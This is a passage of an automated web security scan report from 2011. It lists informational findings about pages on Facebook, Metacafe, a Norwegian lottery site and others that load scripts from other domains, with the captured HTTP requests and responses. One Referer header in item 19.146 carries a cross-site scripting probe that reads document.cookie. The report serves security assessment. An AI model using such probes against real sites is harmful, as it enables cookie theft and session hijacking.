Path:   /WinningsCom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.144. http://www.facebook.com/crazyscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crazyscratch

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.145. http://www.facebook.com/peoplespostcodelottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /peoplespostcodelottery

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.146. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.254.27
X-Cnection: close
Date: Mon, 16 May 2011 12:49:45 GMT
Content-Length: 9862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.147. http://www.gx4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gx4.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.gx4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 11:54:30 GMT
ETag: "34e8030-17e7-1d372980"
Accept-Ranges: bytes
Content-Length: 6119
Connection: close
Content-Type: text/html; charset=ISO-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>G4,
...[SNIP]...
<P>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

19.148. http://www.heavenaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heavenaffiliates.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...
<!-- Scripts -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

19.149. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<!-- end #content -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.150. http://www.incomate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.incomate.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.incomate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/html
Last-Modified: Tue, 10 May 2011 20:41:22 GMT
Accept-Ranges: bytes
ETag: "73f739f52fcc1:0",""
Server: Microsoft-IIS/7.5
Date: Mon, 16 May 2011 12:33:51 GMT
Connection: close
Content-Length: 15841

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<hea
...[SNIP]...
<div id="feed">
<script language="JavaScript" src="http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&amp;num=2&amp;desc=100&amp;targ=y&amp;utf=y" charset="UTF-8" type="text/javascript"></script>
...[SNIP]...

19.151. http://www.metacafe.com/fplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Global/?v=7850" /><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Global/?v=7850"></script><link type="text/css" rel="stylesheet" href="http://s1.mcstatic.com/CSS/Home/?v=7850" /><script type="text/javascript" src="http://s1.mcstatic.com/JS12/Home/?v=7850"></script><link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Shared/BillboardPlayer.css?v=7850" /><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Shared/BillboardPlayer.js?v=7850"></script><script type="text/javascript" src="http://s4.mcstatic.com/JS12/Shared/BillboardManager.js?v=7850"></script>
...[SNIP]...
</div>            
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- external JS for GA, Omniture and quantcase -->
       <script type="text/javascript" src="http://s.mcstatic.com/JS12/Externals/?v=7850"></script>        
       <!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.152. https://www.neogamespartners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?CMI=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?CMI=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.neogamespartners.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.153. https://www.norskelodd.com/no/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/ HTTP/1.1
Host: www.norskelodd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:11 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 100157


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.154. https://www.norskelodd.com/no/FAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/FAQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 122180
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.155. https://www.norskelodd.com/no/aboutus/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/aboutus/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/aboutus/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 101153
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.156. https://www.norskelodd.com/no/charity/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/charity/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 99027
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.157. https://www.norskelodd.com/no/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/default.aspx HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 100157
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.158. https://www.norskelodd.com/no/fair-play/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/fair-play/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/fair-play/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:31 GMT
Connection: close
Content-Length: 99395
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.159. https://www.norskelodd.com/no/forgotten-password

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/forgotten-password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/forgotten-password HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 98788
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.160. https://www.norskelodd.com/no/play/3Wow

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/3Wow

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/play/3Wow HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:32 GMT
Connection: close
Content-Length: 100360
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
